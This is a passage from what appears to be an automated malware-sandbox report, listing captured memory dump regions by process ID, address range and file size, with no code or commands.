                                                                                                                                                              36KB

                                                                                                                                                            • memory/1368-136-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/1488-323-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/1488-334-0x0000000000030000-0x0000000000033000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              12KB

                                                                                                                                                            • memory/1576-420-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/1676-123-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/1832-418-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2044-321-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2100-173-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2100-320-0x00000000776B0000-0x000000007783E000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              1.6MB

                                                                                                                                                            • memory/2100-275-0x00000000011E0000-0x00000000011E1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/2100-317-0x00000000056B0000-0x00000000056B1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/2156-435-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2184-143-0x00000000001B0000-0x00000000001B1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/2184-115-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2184-165-0x0000000002180000-0x000000000219C000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              112KB

                                                                                                                                                            • memory/2184-181-0x00000000021B0000-0x00000000021B2000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              8KB

                                                                                                                                                            • memory/2192-611-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2268-117-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2268-166-0x00000000052A0000-0x00000000052A1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/2268-161-0x00000000009F0000-0x00000000009F1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/2268-210-0x0000000005460000-0x0000000005461000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/2280-431-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2300-393-0x0000019EA8850000-0x0000019EA891F000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              828KB

                                                                                                                                                            • memory/2300-328-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2300-392-0x0000019EA87E0000-0x0000019EA884F000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              444KB

                                                                                                                                                            • memory/2332-347-0x0000000000400000-0x00000000027DB000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              35.9MB

                                                                                                                                                            • memory/2332-126-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2332-344-0x0000000004860000-0x0000000005186000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              9.1MB

                                                                                                                                                            • memory/2344-417-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              80KB

                                                                                                                                                            • memory/2344-409-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2368-174-0x0000000004B50000-0x0000000004B51000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/2368-238-0x0000000004E00000-0x0000000004E01000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/2368-205-0x0000000004A30000-0x0000000005036000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              6.0MB

                                                                                                                                                            • memory/2368-171-0x0000000004AF0000-0x0000000004AF1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/2368-135-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/2368-154-0x00000000002E0000-0x00000000002E1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/3008-430-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/3016-399-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/3032-322-0x0000000000E80000-0x0000000000E96000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              88KB

                                                                                                                                                            • memory/3172-212-0x0000000001220000-0x0000000001232000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              72KB

                                                                                                                                                            • memory/3172-197-0x0000000000DE0000-0x0000000000DF0000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              64KB

                                                                                                                                                            • memory/3172-178-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/3176-199-0x0000000004E00000-0x0000000005406000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              6.0MB

                                                                                                                                                            • memory/3176-200-0x0000000004F00000-0x0000000004F01000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/3176-160-0x0000000000650000-0x0000000000651000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/3176-169-0x0000000005410000-0x0000000005411000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/3176-120-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/3300-176-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/3300-201-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              80KB

                                                                                                                                                            • memory/3300-610-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/3396-608-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/3544-413-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/3544-419-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              80KB

                                                                                                                                                            • memory/3548-116-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/3548-193-0x0000000004BF0000-0x0000000004BF1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/3548-188-0x00000000049F0000-0x00000000049F1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/3548-153-0x00000000001F0000-0x00000000001F1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/3948-239-0x0000000005450000-0x0000000005451000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/3948-128-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/3948-208-0x0000000001130000-0x0000000001131000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/3948-207-0x00000000776B0000-0x000000007783E000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              1.6MB

                                                                                                                                                            • memory/4052-428-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/4072-433-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/4072-448-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4104-338-0x0000000000400000-0x00000000023BB000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              31.7MB

                                                                                                                                                            • memory/4104-308-0x00000000023C0000-0x000000000246E000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              696KB

                                                                                                                                                            • memory/4104-179-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/4156-378-0x0000000005140000-0x0000000005141000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4156-363-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/4260-458-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/4288-265-0x0000000004750000-0x0000000004751000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4288-295-0x00000000047F0000-0x00000000047F1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4288-291-0x00000000047E0000-0x00000000047E1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4288-289-0x00000000047D0000-0x00000000047D1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4288-284-0x00000000047B0000-0x00000000047B1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4288-232-0x0000000004700000-0x0000000004701000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4288-287-0x00000000047C0000-0x00000000047C1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4288-235-0x0000000004770000-0x0000000004771000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4288-282-0x00000000047A0000-0x00000000047A1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4288-313-0x0000000004800000-0x0000000004801000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4288-236-0x0000000004710000-0x0000000004711000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4288-247-0x0000000004720000-0x0000000004721000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4288-274-0x0000000004780000-0x0000000004781000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4288-279-0x0000000004790000-0x0000000004791000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4288-271-0x0000000004760000-0x0000000004761000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4288-315-0x0000000004810000-0x0000000004811000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4288-253-0x0000000004740000-0x0000000004741000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4288-250-0x0000000004730000-0x0000000004731000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4288-216-0x0000000002310000-0x000000000234C000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              240KB

                                                                                                                                                            • memory/4288-218-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4288-202-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/4328-606-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/4428-406-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/4460-440-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4460-426-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/4472-244-0x0000000000418F7A-mapping.dmp
                                                                                                                                                            • memory/4472-305-0x0000000005860000-0x0000000005E66000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              6.0MB

                                                                                                                                                            • memory/4472-242-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              120KB

                                                                                                                                                            • memory/4500-252-0x0000000000418E52-mapping.dmp
                                                                                                                                                            • memory/4500-249-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              120KB

                                                                                                                                                            • memory/4500-310-0x0000000005380000-0x0000000005986000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              6.0MB

                                                                                                                                                            • memory/4528-254-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              120KB

                                                                                                                                                            • memory/4528-259-0x000000000041905A-mapping.dmp
                                                                                                                                                            • memory/4528-301-0x0000000005530000-0x0000000005A2E000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              5.0MB

                                                                                                                                                            • memory/4588-425-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/4588-451-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4588-445-0x0000000005010000-0x0000000005011000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4588-446-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4588-438-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4588-449-0x0000000005030000-0x0000000005031000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4588-444-0x0000000005000000-0x0000000005001000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4660-609-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/4716-411-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/4824-404-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/4856-354-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/4856-410-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/4876-424-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/4916-346-0x000000001BAA0000-0x000000001BAA2000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              8KB

                                                                                                                                                            • memory/4916-293-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/4948-296-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/5008-423-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/5008-429-0x0000000000400000-0x000000000046D000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              436KB

                                                                                                                                                            • memory/5112-422-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              80KB

                                                                                                                                                            • memory/5112-416-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/5508-554-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/5556-555-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/5676-559-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/5720-558-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/5780-579-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/5900-561-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/5924-607-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/6088-540-0x0000000000000000-mapping.dmp